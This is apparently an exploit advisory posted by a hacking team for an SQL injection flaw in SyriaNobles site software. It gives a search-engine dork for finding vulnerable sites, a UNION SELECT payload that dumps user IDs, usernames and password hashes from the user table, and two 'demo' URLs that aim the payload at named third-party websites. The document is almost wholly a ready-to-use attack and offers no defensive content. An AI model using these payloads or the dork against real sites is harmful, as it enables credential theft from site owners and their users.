############################################################################ # Exploit Title: SyriaNobles SQL Injection Vulnerabilitiy # Google Dork: inurl:view-page.php "Powered by SyriaNobles" # Date: 4/1/2012 # Author: H4ckCity Security Team # Discovered By: farbodmahini # Home: WwW.H4ckCity.Org # Version: All Version # Category:: webapps # Security Risk:: High # Tested on: GNU/Linux Ubuntu - Windows Server - win7 ############################################################################ # Exploit: # # # http://[target]/page.php?id=[SQL] # # [~] SQL : # # -1+union+select+1,2,group_concat(id,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11+from+user # # # [~] Demo: # # www.zain-trade.com/view-page.php?id=-41+union+select+1,2,group_concat(id,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14+from+user-- # # scbb.biz/view-page.php?id=-1+union+select+1,2,group_concat(id,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11+from+user # ############################################################################ # Special Thanks : Mehdi.H4ckcity-2MzRp-Mikili-M.Prince-Bl4ck.Viper-iC0d3R- # IrIsT-K0242-P0W3RFU7-Mr.M4st3r-Higher_Sense ,... ############################################################################ GreetZ : All H4ckCity Member - BHG Members ############################################################################